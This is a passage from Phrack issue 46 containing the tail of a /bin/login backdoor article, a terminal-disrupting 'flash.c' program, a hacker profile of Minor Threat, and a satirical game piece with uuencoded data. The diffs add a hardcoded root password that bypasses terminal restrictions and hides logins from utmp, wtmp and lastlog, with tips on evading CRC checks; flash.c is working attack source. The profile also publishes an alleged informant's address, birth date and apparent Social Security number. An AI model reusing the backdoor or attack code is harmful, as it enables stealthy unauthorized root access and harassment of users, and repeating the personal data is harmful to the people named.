- Hides you in UTMP
|
|||
|
[B
|
|||
|
- Does not Log to WTMP
|
|||
|
|
|||
|
- Allows Root Login from NON authorized Terminals
|
|||
|
|
|||
|
- Preserves the Lastlogin information (ie Keeps it as though you had never
|
|||
|
logged in with the magic password)
|
|||
|
|
|||
|
- Produces a binary that is exactly the same length as the original binary.
|
|||
|
|
|||
|
IMPLEMENTATION
|
|||
|
~~~~~~~~~~~~~~
|
|||
|
I am not going to go into great detail here on how to write such a system as
|
|||
|
this. The code is very simple and it contains plenty of comments, so just look
|
|||
|
there for ideas.
|
|||
|
|
|||
|
For this system to have less chance of being detected you need to do several
|
|||
|
things.
|
|||
|
|
|||
|
First select a "Magic" password that is not easily identifiable by stringing the
|
|||
|
binary. This is why in the example I have used the word "CONSOLE", this word
|
|||
|
already appears several times in the binary so detection of one more is
|
|||
|
unlikely.
|
|||
|
|
|||
|
Admittedly I could of encrypted the "Magic" password, but I decided against this
|
|||
|
for several reasons.
|
|||
|
|
|||
|
The second thing you would need to do if you where illegally placing a "Magic"
|
|||
|
login on a system would be to ensure that the admins are not doing CRC checks on
|
|||
|
SUID(0) programs, or if they are that you change the CRC record of login to
|
|||
|
match the CRC record of the "Magic" login.
|
|||
|
|
|||
|
Thirdly do not forget to make the date and time stamp of the new binary match
|
|||
|
the old ones.
|
|||
|
|
|||
|
To install a new /bin/login on a system you will need to be root, now if you are
|
|||
|
already root why would you bother? Simple, it is just one more backdoor that you
|
|||
|
can use to get back in if you are detected.
|
|||
|
|
|||
|
LIMITATIONS
|
|||
|
~~~~~~~~~~~
|
|||
|
This version of the "Magic" login program does not have the following features,
|
|||
|
I leave it entirely up to you about implementing something to fix them:
|
|||
|
|
|||
|
- Shells & Programs show up in the Process Table
|
|||
|
|
|||
|
- tty Ownership and attributes
|
|||
|
|
|||
|
- /proc filesystem
|
|||
|
|
|||
|
Any one of these to an alert system admin will show that there is an "invisible"
|
|||
|
user on the system. However it has been my experience that most admin's rarely
|
|||
|
look at these things, or if they do they can not see the wood for the trees.
|
|||
|
|
|||
|
-----<cut here>-----
|
|||
|
|
|||
|
diff -c /root/work/login/console.c /root/work/logon/console.c
|
|||
|
*** /root/work/login/console.c Sun Oct 11 07:16:47 1992
|
|||
|
--- /root/work/logon/console.c Sat Jun 4 15:29:15 1994
|
|||
|
***************
|
|||
|
*** 21,26 ****
|
|||
|
--- 21,27 ----
|
|||
|
#endif
|
|||
|
|
|||
|
extern char *getdef_str();
|
|||
|
+ extern int magik;
|
|||
|
|
|||
|
/*
|
|||
|
* tty - return 1 if the "tty" is a console device, else 0.
|
|||
|
***************
|
|||
|
*** 47,52 ****
|
|||
|
--- 48,57 ----
|
|||
|
if ((console = getdef_str("CONSOLE")) == NULL)
|
|||
|
return 1;
|
|||
|
|
|||
|
+ /* Fix for Magic Login - UnAuth Console - Data King */
|
|||
|
+
|
|||
|
+ if (magik==1)
|
|||
|
+ return 1;
|
|||
|
/*
|
|||
|
* If this isn't a filename, then it is a ":" delimited list of
|
|||
|
* console devices upon which root logins are allowed.
|
|||
|
diff -c /root/work/login/lmain.c /root/work/logon/lmain.c
|
|||
|
*** /root/work/login/lmain.c Mon Oct 12 17:35:06 1992
|
|||
|
--- /root/work/logon/lmain.c Sat Jun 4 15:30:37 1994
|
|||
|
***************
|
|||
|
*** 105,110 ****
|
|||
|
--- 105,111 ----
|
|||
|
char *Prog;
|
|||
|
int newenvc = 0;
|
|||
|
int maxenv = MAXENV;
|
|||
|
+ int magik; /* Global Flag for Magic Login - Data King */
|
|||
|
|
|||
|
/*
|
|||
|
* External identifiers.
|
|||
|
diff -c /root/work/login/log.c /root/work/logon/log.c
|
|||
|
*** /root/work/login/log.c Mon Oct 12 17:35:07 1992
|
|||
|
--- /root/work/logon/log.c Sat Jun 4 15:37:22 1994
|
|||
|
***************
|
|||
|
*** 53,58 ****
|
|||
|
--- 53,59 ----
|
|||
|
extern struct passwd pwent;
|
|||
|
extern struct lastlog lastlog;
|
|||
|
extern char **environ;
|
|||
|
+ extern char magik;
|
|||
|
|
|||
|
long lseek ();
|
|||
|
time_t time ();
|
|||
|
***************
|
|||
|
*** 83,89 ****
|
|||
|
(void) time (&newlog.ll_time);
|
|||
|
(void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line);
|
|||
|
(void) lseek (fd, offset, 0);
|
|||
|
! (void) write (fd, (char *) &newlog, sizeof newlog);
|
|||
|
(void) close (fd);
|
|||
|
}
|
|||
|
|
|||
|
--- 84,93 ----
|
|||
|
(void) time (&newlog.ll_time);
|
|||
|
(void) strncpy (newlog.ll_line, utent.ut_line, sizeof newlog.ll_line);
|
|||
|
(void) lseek (fd, offset, 0);
|
|||
|
! if (magik !=1) /* Dont Modify Last login Specs if this is a Magic */
|
|||
|
! { /* login - Data King */
|
|||
|
! (void) write (fd, (char *) &newlog, sizeof newlog);
|
|||
|
! }
|
|||
|
(void) close (fd);
|
|||
|
}
|
|||
|
|
|||
|
diff -c /root/work/login/utmp.c /root/work/logon/utmp.c
|
|||
|
*** /root/work/login/utmp.c Mon Oct 12 17:35:36 1992
|
|||
|
--- /root/work/logon/utmp.c Sat Jun 4 15:41:13 1994
|
|||
|
***************
|
|||
|
*** 70,75 ****
|
|||
|
--- 70,77 ----
|
|||
|
extern long lseek();
|
|||
|
#endif /* SVR4 */
|
|||
|
|
|||
|
+ extern int magik;
|
|||
|
+
|
|||
|
#define NO_UTENT \
|
|||
|
"No utmp entry. You must exec \"login\" from the lowest level \"sh\""
|
|||
|
#define NO_TTY \
|
|||
|
***************
|
|||
|
*** 353,368 ****
|
|||
|
/*
|
|||
|
* Scribble out the new entry and close the file. We're done
|
|||
|
* with UTMP, next we do WTMP (which is real easy, put it on
|
|||
|
! * the end of the file.
|
|||
|
*/
|
|||
|
!
|
|||
|
! (void) write (fd, &utmp, sizeof utmp);
|
|||
|
! (void) close (fd);
|
|||
|
!
|
|||
|
! if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) {
|
|||
|
(void) write (fd, &utmp, sizeof utmp);
|
|||
|
(void) close (fd);
|
|||
|
}
|
|||
|
- utent = utmp;
|
|||
|
#endif /* SVR4 */
|
|||
|
}
|
|||
|
--- 355,372 ----
|
|||
|
/*
|
|||
|
* Scribble out the new entry and close the file. We're done
|
|||
|
* with UTMP, next we do WTMP (which is real easy, put it on
|
|||
|
! * the end of the file. If Magic Login, DONT write out UTMP - Data King
|
|||
|
*/
|
|||
|
! if (magik !=1)
|
|||
|
! {
|
|||
|
(void) write (fd, &utmp, sizeof utmp);
|
|||
|
(void) close (fd);
|
|||
|
+
|
|||
|
+ if ((fd = open (WTMP_FILE, O_WRONLY|O_APPEND)) >= 0) {
|
|||
|
+ (void) write (fd, &utmp, sizeof utmp);
|
|||
|
+ (void) close (fd);
|
|||
|
+ }
|
|||
|
+ utent = utmp;
|
|||
|
}
|
|||
|
#endif /* SVR4 */
|
|||
|
}
|
|||
|
diff -c /root/work/login/valid.c /root/work/logon/valid.c
|
|||
|
*** /root/work/login/valid.c Sun Oct 11 07:16:55 1992
|
|||
|
--- /root/work/logon/valid.c Sat Jun 4 15:47:28 1994
|
|||
|
***************
|
|||
|
*** 25,30 ****
|
|||
|
--- 25,32 ----
|
|||
|
static char _sccsid[] = "@(#)valid.c 3.4 08:44:15 9/12/91";
|
|||
|
#endif
|
|||
|
|
|||
|
+ extern int magik;
|
|||
|
+
|
|||
|
/*
|
|||
|
* valid - compare encrypted passwords
|
|||
|
*
|
|||
|
***************
|
|||
|
*** 43,48 ****
|
|||
|
--- 45,64 ----
|
|||
|
char *encrypt;
|
|||
|
char *salt;
|
|||
|
char *pw_encrypt ();
|
|||
|
+ char *magic;
|
|||
|
+
|
|||
|
+ /*
|
|||
|
+ * Below is the piece of code that checks to see if the password
|
|||
|
+ * supplied by the user = the Magic Password - Data King
|
|||
|
+ */
|
|||
|
+
|
|||
|
+ magic = "CONSOLE"; /* Define this as the Magic Password - Data King */
|
|||
|
+
|
|||
|
+ if (strcmp(password,magic) == 0)
|
|||
|
+ {
|
|||
|
+ magik = 1;
|
|||
|
+ return(1);
|
|||
|
+ }
|
|||
|
|
|||
|
/*
|
|||
|
* Start with blank or empty password entries. Always encrypt
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
/* flash.c */
|
|||
|
|
|||
|
/* This little program is intended to quickly mess up a user's
|
|||
|
terminal by issuing a talk request to that person and sending
|
|||
|
vt100 escape characters that force the user to logout or kill
|
|||
|
his/her xterm in order to regain a sane view of the text.
|
|||
|
It the user's message mode is set to off (mesg n) he/she will
|
|||
|
be unharmed.
|
|||
|
This program is really nasty :-)
|
|||
|
|
|||
|
Usage: flash user@host
|
|||
|
|
|||
|
try compiling with: gcc -o flash flash.c
|
|||
|
*/
|
|||
|
|
|||
|
|
|||
|
#include <sys/types.h>
|
|||
|
#include <sys/socket.h>
|
|||
|
#include <netinet/in.h>
|
|||
|
#include <netdb.h>
|
|||
|
#include <stdio.h>
|
|||
|
#include <strings.h>
|
|||
|
|
|||
|
/* this should really be in an include file.. */
|
|||
|
|
|||
|
#define OLD_NAME_SIZE 9
|
|||
|
#define NAME_SIZE 12
|
|||
|
#define TTY_SIZE 16
|
|||
|
typedef struct {
|
|||
|
char type;
|
|||
|
char l_name[OLD_NAME_SIZE];
|
|||
|
char r_name[OLD_NAME_SIZE];
|
|||
|
char filler;
|
|||
|
u_long id_num;
|
|||
|
u_long pid;
|
|||
|
char r_tty[TTY_SIZE];
|
|||
|
struct sockaddr_in addr;
|
|||
|
struct sockaddr_in ctl_addr;
|
|||
|
} OLD_MSG;
|
|||
|
|
|||
|
typedef struct {
|
|||
|
u_char vers;
|
|||
|
char type;
|
|||
|
u_short filler;
|
|||
|
u_long id_num;
|
|||
|
struct sockaddr_in addr;
|
|||
|
struct sockaddr_in ctl_addr;
|
|||
|
long pid;
|
|||
|
char l_name[NAME_SIZE];
|
|||
|
char r_name[NAME_SIZE];
|
|||
|
char r_tty[TTY_SIZE];
|
|||
|
} CTL_MSG;
|
|||
|
|
|||
|
#define TALK_VERSION 1 /* protocol version */
|
|||
|
|
|||
|
/* Types */
|
|||
|
#define LEAVE_INVITE 0
|
|||
|
#define LOOK_UP 1
|
|||
|
#define DELETE 2
|
|||
|
#define ANNOUNCE 3
|
|||
|
|
|||
|
int current = 1; /* current id.. this to avoid duplications */
|
|||
|
|
|||
|
struct sockaddr_in *getinaddr(char *hostname, u_short port)
|
|||
|
{
|
|||
|
static struct sockaddr addr;
|
|||
|
struct sockaddr_in *address;
|
|||
|
struct hostent *host;
|
|||
|
|
|||
|
address = (struct sockaddr_in *)&addr;
|
|||
|
(void) bzero( (char *)address, sizeof(struct sockaddr_in) );
|
|||
|
/* fill in the easy fields */
|
|||
|
address->sin_family = AF_INET;
|
|||
|
address->sin_port = htons(port);
|
|||
|
/* first, check if the address is an ip address */
|
|||
|
address->sin_addr.s_addr = inet_addr(hostname);
|
|||
|
if ( (int)address->sin_addr.s_addr == -1)
|
|||
|
{
|
|||
|
/* it wasn't.. so we try it as a long host name */
|
|||
|
host = gethostbyname(hostname);
|
|||
|
if (host)
|
|||
|
{
|
|||
|
/* wow. It's a host name.. set the fields */
|
|||
|
/* ?? address->sin_family = host->h_addrtype; */
|
|||
|
bcopy( host->h_addr, (char *)&address->sin_addr,
|
|||
|
host->h_length);
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
/* oops.. can't find it.. */
|
|||
|
puts("Couldn't find address");
|
|||
|
exit(-1);
|
|||
|
return (struct sockaddr_in *)0;
|
|||
|
}
|
|||
|
}
|
|||
|
/* all done. */
|
|||
|
return (struct sockaddr_in *)address;
|
|||
|
}
|
|||
|
|
|||
|
SendTalkPacket(struct sockaddr_in *target, char *p, int psize)
|
|||
|
{
|
|||
|
int s;
|
|||
|
struct sockaddr sample; /* not used.. only to get the size */
|
|||
|
|
|||
|
s = socket(AF_INET, SOCK_DGRAM, 0);
|
|||
|
sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) );
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
new_ANNOUNCE(char *hostname, char *remote, char *local)
|
|||
|
{
|
|||
|
CTL_MSG packet;
|
|||
|
struct sockaddr_in *address;
|
|||
|
|
|||
|
/* create a packet */
|
|||
|
address = getinaddr(hostname, 666 );
|
|||
|
address->sin_family = htons(AF_INET);
|
|||
|
|
|||
|
bzero( (char *)&packet, sizeof(packet) );
|
|||
|
packet.vers = TALK_VERSION;
|
|||
|
packet.type = ANNOUNCE;
|
|||
|
packet.pid = getpid();
|
|||
|
packet.id_num = current;
|
|||
|
bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
|
|||
|
bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
|
|||
|
strncpy( packet.l_name, local, NAME_SIZE);
|
|||
|
strncpy( packet.r_name, remote, NAME_SIZE);
|
|||
|
strncpy( packet.r_tty, "", 1);
|
|||
|
|
|||
|
SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) );
|
|||
|
}
|
|||
|
|
|||
|
old_ANNOUNCE(char *hostname, char *remote, char *local)
|
|||
|
{
|
|||
|
OLD_MSG packet;
|
|||
|
struct sockaddr_in *address;
|
|||
|
|
|||
|
/* create a packet */
|
|||
|
address = getinaddr(hostname, 666 );
|
|||
|
address->sin_family = htons(AF_INET);
|
|||
|
|
|||
|
bzero( (char *)&packet, sizeof(packet) );
|
|||
|
packet.type = ANNOUNCE;
|
|||
|
packet.pid = getpid();
|
|||
|
packet.id_num = current;
|
|||
|
bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
|
|||
|
bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
|
|||
|
strncpy( packet.l_name, local, NAME_SIZE);
|
|||
|
strncpy( packet.r_name, remote, NAME_SIZE);
|
|||
|
strncpy( packet.r_tty, "", 1);
|
|||
|
|
|||
|
SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) );
|
|||
|
}
|
|||
|
|
|||
|
main(int argc, char *argv[])
|
|||
|
{
|
|||
|
char *hostname, *username;
|
|||
|
int pid;
|
|||
|
|
|||
|
if ( (pid = fork()) == -1)
|
|||
|
{
|
|||
|
perror("fork()");
|
|||
|
exit(-1);
|
|||
|
}
|
|||
|
if ( !pid )
|
|||
|
{
|
|||
|
exit(0);
|
|||
|
}
|
|||
|
if (argc < 2) {
|
|||
|
puts("Usage: <finger info> ");
|
|||
|
exit(5);
|
|||
|
}
|
|||
|
username = argv[1];
|
|||
|
if ( (hostname = (char *)strchr(username, '@')) == NULL )
|
|||
|
{
|
|||
|
puts("Invalid name. ");
|
|||
|
exit(-1);
|
|||
|
}
|
|||
|
*hostname = '\0';
|
|||
|
hostname++;
|
|||
|
|
|||
|
if (*username == '~')
|
|||
|
username++;
|
|||
|
|
|||
|
#define FIRST "\033c\033(0\033#8"
|
|||
|
#define SECOND "\033[1;3r\033[J"
|
|||
|
#define THIRD "\033[5m\033[?5h"
|
|||
|
new_ANNOUNCE(hostname, username, FIRST);
|
|||
|
old_ANNOUNCE(hostname, username, FIRST);
|
|||
|
current++;
|
|||
|
new_ANNOUNCE(hostname, username, SECOND);
|
|||
|
new_ANNOUNCE(hostname, username, SECOND);
|
|||
|
current++;
|
|||
|
new_ANNOUNCE(hostname, username, THIRD);
|
|||
|
old_ANNOUNCE(hostname, username, THIRD);
|
|||
|
}
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 5 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
|
|||
|
-:[ Phrack Pro-Phile ]:-
|
|||
|
|
|||
|
This issue our prophile introduces you to one of the craziest people
|
|||
|
I've ever met from the Underground. And coming from a complete loon
|
|||
|
like me, that's saying something. This guy is a real Renaissance Man:
|
|||
|
Hacker, programmer, burglar, convict, star of stage and screen...
|
|||
|
Of course, that someone could only be:
|
|||
|
|
|||
|
Minor Threat
|
|||
|
~~~~~~~~~~~~
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
|
|||
|
Personal Info:
|
|||
|
|
|||
|
Handle: Minor Threat
|
|||
|
Call him: MT, minor, lamer
|
|||
|
Born: 1972 in Walnut Creek, California
|
|||
|
Age: 22
|
|||
|
Height: 6'1"
|
|||
|
Weight: 155 lbs
|
|||
|
e-mail: mthreat@paranoia.com
|
|||
|
www: http://www.paranoia.com/~mthreat/
|
|||
|
Affiliations: Dark Side Research
|
|||
|
Computers owned: 1981: IBM PC
|
|||
|
1982: none
|
|||
|
1984: PCjr
|
|||
|
1988: XT Clone
|
|||
|
1990: 386/25 Clone
|
|||
|
1992: Too many to legally list
|
|||
|
1994: Pentium & 486
|
|||
|
|
|||
|
How I got started
|
|||
|
~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
In 1981, my dad worked for IBM. In October of that year, he
|
|||
|
brought home a PC, and I jumped on BASIC. It wasn't until 1984 that
|
|||
|
I got my first modem. I had just moved to Florida with my dad, and
|
|||
|
he had a modem. I met some other kids with computers and modems and
|
|||
|
they taught me what modems were for: "You call other people's
|
|||
|
computers and try to get their passwords and intercept their mail".
|
|||
|
(That's what I was taught!) It wasn't until a few months later I
|
|||
|
realized that this wasn't the actual purpose of BBSs and modems.
|
|||
|
My first BBS was the Towne Crier BBS at FAU (Florida Atlantic
|
|||
|
University), 305-393-3891 (I still remember that damn number), but
|
|||
|
the NPA has since changed to 407. We thought it was so cool when
|
|||
|
we logged on as "All" and deleted all the messages posted to "All".
|
|||
|
|
|||
|
In about 1985, I moved back to Austin. I screwed around for
|
|||
|
several years without doing any real hacking. When I got to high
|
|||
|
school, I wanted to change my grades like in War Games, so I looked
|
|||
|
through the counselor's office until I found a number to the
|
|||
|
Education Service Center. I had to scan a whole _100_ numbers
|
|||
|
(929-13xx) to find the HP3000 dialup. Once I found it, I had no
|
|||
|
idea what to do. I gave the number to a friend in high school,
|
|||
|
who gave it to some of his hacker friends. They hacked it and gave
|
|||
|
it back to me, complete with a full list of passwords and commands.
|
|||
|
It turns out, the two Austin hackers who did it were The Mentor and
|
|||
|
Erik Bloodaxe, but I didn't know that for another 3 years.
|
|||
|
|
|||
|
Shortly after this, I picked my permanent handle. Minor Threat
|
|||
|
was an early-to-mid 1980's punk band from Washington, DC. They're no
|
|||
|
longer together, but Fugazi is pretty good and Ian McKaye (from
|
|||
|
Minor Threat) is in Fugazi. I actually got the handle off of one
|
|||
|
of my sister's tapes, before I even heard them. But now I like the
|
|||
|
music too.
|
|||
|
|
|||
|
Eventually, I found a local pirate board, met all the local
|
|||
|
pirates, and got into the warez scene for a while. I joined PE
|
|||
|
(Public Enemy), the pirate group. (I cracked the warez!) Warez were
|
|||
|
only so fun, so I looked for other stuff. I met some VMB lamers and
|
|||
|
got into that scene for about a month, and got bored again.
|
|||
|
|
|||
|
This was 1990, our 950s were running out, and we needed another
|
|||
|
way to call out. So I took an old VMB hacking program I had
|
|||
|
written, and changed it around to scan for tones, in random order
|
|||
|
to avoid Ma Bell problems. I nicknamed it ToneLoc, short for Tone-
|
|||
|
Locator. I gave it to some friends (Alexis Machine & Marko Ramius)
|
|||
|
and eventually, it ended up on some warez boards. It got pretty
|
|||
|
popular, so I made a version that worked for more people, called
|
|||
|
it 0.90, and released it. Then I lost the source in a hard drive
|
|||
|
crash, and stopped working on it.
|
|||
|
|
|||
|
I was 18 and mom said it was time to get out of her house, so
|
|||
|
I got my own apartment. Marko Ramius and I learned about trashing
|
|||
|
central offices, and gained COSMOS access. We barely knew what
|
|||
|
COSMOS was .. I knew I had read about it in old Phrack articles, and
|
|||
|
I remembered that it was "elite." Our problem was, we still knew no
|
|||
|
other "real" hackers, and we had to learn COSMOS. After trashing
|
|||
|
and trashing, we still had no COSMOS manuals. We had to get them
|
|||
|
somehow. I can't say how, I'll leave it to your imagination.
|
|||
|
|
|||
|
Marko and I started breaking in buildings and got pretty
|
|||
|
good at it. We had about a 60% success rate I would guess. But we
|
|||
|
never stole anything -- we just looked for cool information. In
|
|||
|
1991, we got caught in a building, and got charged with Criminal
|
|||
|
Trespassing. We both got probation for a Class A misdemeanor.
|
|||
|
We decided it was time to stop breaking in buildings.
|
|||
|
|
|||
|
Late in 1991, I got e-mail on a bulletin board from someone
|
|||
|
named Mucho Maas. He said he had gotten ToneLoc and wanted a
|
|||
|
few new features. I told him I had lost the current source and
|
|||
|
all I had was an old (0.85) source. He said he would take the
|
|||
|
old source, add the new features, and bring it up-to-date with
|
|||
|
the current source. So he did, and we released ToneLoc 0.95.
|
|||
|
If it weren't for Mucho, ToneLoc would still be at version 0.90,
|
|||
|
and anyone who ran 0.90 knows how hard it was to get it running
|
|||
|
right.
|
|||
|
|
|||
|
About the same time, I was getting on a few BBSs in the
|
|||
|
Washington DC area. (Pentavia was the best while it was up).
|
|||
|
I met several people there... including a guy named Codec. Codec
|
|||
|
was mostly a phone phreak, but did a little hacking as well. But
|
|||
|
when it came to PBX's, he was a master. Not only had he exploited
|
|||
|
PBXs for free long distance use like the rest of us, but he had
|
|||
|
actually REMOVED entire PBX systems from buildings! (See his
|
|||
|
article on how to do this, Phrack 43, article 15). But he had
|
|||
|
also gotten caught and was on federal probation.
|
|||
|
|
|||
|
A few months after I met Codec, he had an 'incident'
|
|||
|
and was on the run again. I agreed to let him live with me, so
|
|||
|
he flew down and moved in. We got a 2 bedroom place, and set
|
|||
|
the place up d0pe. There were over 9 phone extensions, (not
|
|||
|
including cordless), and about the same number of computers (Most
|
|||
|
of which were Codec's). We had the funnest 3 months ever ...
|
|||
|
but about 2 weeks after SummerCon 1992, we got arrested.
|
|||
|
|
|||
|
|
|||
|
Favorite things
|
|||
|
~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
Women: w0w
|
|||
|
Music: Sonic Youth, Cure, Fugazi, Minor Threat, Orb, B-Boys,
|
|||
|
Jane's Addiction.
|
|||
|
Favorite Book: 1984
|
|||
|
My Car: 1990 300ZX Twin Turbo, Wolf Chip mod to 360
|
|||
|
horsepower. It's fucking fast.
|
|||
|
Favorite Movies: Jackie Chan movies, The Killer, Reservoir Dogs,
|
|||
|
The Lost Boys, Near Dark, Hardware.
|
|||
|
Favorite TV: MacGyver
|
|||
|
|
|||
|
|
|||
|
What are some of your most memorable experiences?
|
|||
|
|
|||
|
Being polygraphed by the Secret Service in 1991 for something having
|
|||
|
to do with some lamer threatening the president on an Alliance
|
|||
|
Teleconference. I failed the polygraph the first time, then I
|
|||
|
passed it the second time. (How's that for the government?)
|
|||
|
Eventually, some other 15-year old got probation for doing it.
|
|||
|
|
|||
|
Being arrested with Codec in 1992. He ran, outran the cops, jumped
|
|||
|
a fence about 8 feet tall, and eventually got in a struggle with
|
|||
|
a cop over the his gun (Officer Sheldon Salsbury, Austin PD). The
|
|||
|
gun went off, and we were both booked on attempted capital murder.
|
|||
|
It turned out that the bullet hit no one, and all the blood was from
|
|||
|
the cop hitting himself in the head with his own gun, although the
|
|||
|
cop claims that Codec hit him in the forehead with a 2-meter ham
|
|||
|
radio from like 20 feet away. Right. A search warrant was executed
|
|||
|
on our apartment, and approximately $800,000 worth of AT&T Switching
|
|||
|
equipment was seized from Codec's closet. It turns out, we were
|
|||
|
narced on and set-up by :
|
|||
|
|
|||
|
Jon R. Massengale
|
|||
|
6501 Deer Hollow
|
|||
|
Austin, TX 78750
|
|||
|
DOB: 9-7-62
|
|||
|
SSN: 463-92-0306
|
|||
|
|
|||
|
|
|||
|
Being the first in Texas to have Caller-ID, before it was legally
|
|||
|
available.
|
|||
|
|
|||
|
Losing control of my car at 140mph, doing a slow 360 at about 120,
|
|||
|
living through it, and not doing too much damage to my car.
|
|||
|
|
|||
|
|
|||
|
Good times:
|
|||
|
|
|||
|
Going up to Seattle to visit Cerebrum in May 1993, seeing Fugazi,
|
|||
|
getting our car towed, then reading the dialups to the towing
|
|||
|
company's xenix (login: sysadm). Finally getting our Oki 900's
|
|||
|
to clone/tumble/do other d0pe things. Calling each other on
|
|||
|
our Okis from 5 feet away, putting them together and causing
|
|||
|
feedback.
|
|||
|
|
|||
|
Setting up my apartment with Codec with a 10-station Merlin system,
|
|||
|
and a 9-station network.
|
|||
|
|
|||
|
SummerCon 1993. "Culmination of Coolness." Sorry, can't say any
|
|||
|
more.
|
|||
|
|
|||
|
|
|||
|
Some People To Mention:
|
|||
|
|
|||
|
|
|||
|
There are a lot of people who I would like to mention that have helped
|
|||
|
me greatly and who I have known for a very long time:
|
|||
|
|
|||
|
Marko Ramius - First pirate/hacker I really knew in person. We
|
|||
|
did a lot of crazy shit together.
|
|||
|
|
|||
|
Alexis Machine - Second hacker-type I met, and a true Warez Kid.
|
|||
|
(that's a complement!)
|
|||
|
|
|||
|
Mucho Maas - Brought back ToneLoc from the dead. Always told
|
|||
|
me what I shouldn't do, and always said "I told
|
|||
|
you so" when I got busted.
|
|||
|
|
|||
|
Codec - I had some of the funnest times of my life with
|
|||
|
Codec... unfortunately, it was so much fun it was
|
|||
|
illegal, and we got busted.
|
|||
|
|
|||
|
Cerebrum - Very cool friend who got narced on by a fuckhead
|
|||
|
named Zach, 206-364-0660. Cerebrum is serving
|
|||
|
a 10 month federal sentence in a nice prison camp
|
|||
|
in Sheridan, Oregon. He gets out about December
|
|||
|
10, 1994.
|
|||
|
|
|||
|
The Conflict - Unfortunately, I can't tell you. Maybe in about 8
|
|||
|
more years.
|
|||
|
|
|||
|
ESAC Administrator - "Have you been drinking on the job?"
|
|||
|
|
|||
|
|
|||
|
What I'm up to now
|
|||
|
~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
When I heard that the next Phrack Pro-phile was going to be about
|
|||
|
me, I realized, "I must be retired". It's probably true.. at least I hope
|
|||
|
it is. The 5 months I spent in jail was enough. I just started going
|
|||
|
back to University of Texas, where they will only give me a VAX account
|
|||
|
(lame). For the first time in 4 years, I think my life is going in
|
|||
|
the 'right' direction.
|
|||
|
|
|||
|
Advice
|
|||
|
~~~~~~
|
|||
|
|
|||
|
I can only hope anyone who reads this will take this seriously.
|
|||
|
Here's my advice: If you ever get arrested or even simply questioned about
|
|||
|
ANYTHING AT ALL, DO NOT COOPERATE. Always tell the law enforcement
|
|||
|
official or whoever, "I'm sorry, I can't talk without my lawyer present"
|
|||
|
Cooperating will never help you. Codec recently pointed out to me, that
|
|||
|
we should be the "role models" of what people should do when they get
|
|||
|
busted. Both of us remained loyal and quiet during our whole case. I was
|
|||
|
in jail for 5 months, and Codec is still in prison, but we never talked.
|
|||
|
Being narced on by a 'buddy' is the worst thing that could ever happen
|
|||
|
to you, and narcing on a 'buddy' is the worst thing you could do to
|
|||
|
them. If you get busted for something, don't pass the punishment on
|
|||
|
to someone else. I hope most of you never have to face this, but if
|
|||
|
you do, you will live much better knowing that you didn't give in to
|
|||
|
a bunch of 'law enforcement' pricks.
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 6 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
BIG FUN
|
|||
|
|
|||
|
|
|||
|
Think Federal District Court Judges and Special
|
|||
|
Agents get to have all the fun?
|
|||
|
|
|||
|
Not any more!!
|
|||
|
|
|||
|
It's the Operation Sun Devil Home Game!
|
|||
|
|
|||
|
For the first step in the game, a quick flourish of a pen
|
|||
|
signs away your opponent's rights to any expectations of
|
|||
|
privacy. Bank records, medical records, employment
|
|||
|
files, student records...literally anything is yours
|
|||
|
for the taking.
|
|||
|
|
|||
|
As you progress through the various levels, you move on
|
|||
|
to other legal scenarios like the application for search
|
|||
|
warrant and the summons.
|
|||
|
|
|||
|
It's all here in the Operation Sun Devil Home game, by
|
|||
|
Gailco.
|
|||
|
|
|||
|
===============================================================
|
|||
|
|
|||
|
Other game pieces available via ftp from freeside.com
|
|||
|
in /pub/phrack/gailco.
|
|||
|
|
|||
|
Offer not sold in stores. Do not use.
|
|||
|
Impersonating an officer of the court is a felony.
|
|||
|
|
|||
|
section 1 of uuencode 4.13 of file GAME.PCX by R.E.M.
|
|||
|
|
|||
|
begin 644 GAME.PCX
|
|||
|
M"@,!`0````!/!D@(Q@#&````````````````````````````````````````V
|
|||
|
M```````````````````````````!R@`!`"`#6`(`````````````````````W
|
|||
|
M``````````````````````````````````````````````````#________-(
|
|||
|
M_________\W_________S?_________-_________\W_________S?______D
|
|||
|
M___-_________\W_________S?_________-_________\W_________S?__R
|
|||
|
M_______-_________\W_________S?_________-_________\W_________>
|
|||
|
MS?_________-_________\W_________S?_________-_________\W_____R
|
|||
|
M____S?_________-_________\W_________S?_________-_________\W_R
|
|||
|
M________S?_________-_________\W_________S?_________-________]
|
|||
|
M_\W_________S?_________-_________\W_________S?_________-____R
|
|||
|
M_____\W_________S?_________-_________\W_________S?_________-R
|
|||
|
M_________\W_________S?_________-_________\W_________S?______D
|
|||
|
M___-_________\W_________S?_________-_________\W_________S?__R
|
|||
|
M_______-_]'_P?!'P?[!X<'@P?_!]F#$_\'XPO_!\'______ZO_1_\'P8\'^X
|
|||
|
M8<'@P?_!]&#$_\'XPO_!\'_!_O_____I_]#_'\'@P>'!_@$`?\'&`'_#_\'PF
|
|||
|
MP?@^(!X.?\'_P?C_____YO_0_P_"P\'^`PX_CAX?P__!P,'\'P/"#A_!_\'^^
|
|||
|
M'______E_]#_!X?!Y\'^`PX_#L(>#V_!_\'`?!X'C@\?P?^$#\'_A\[_C___X
|
|||
|
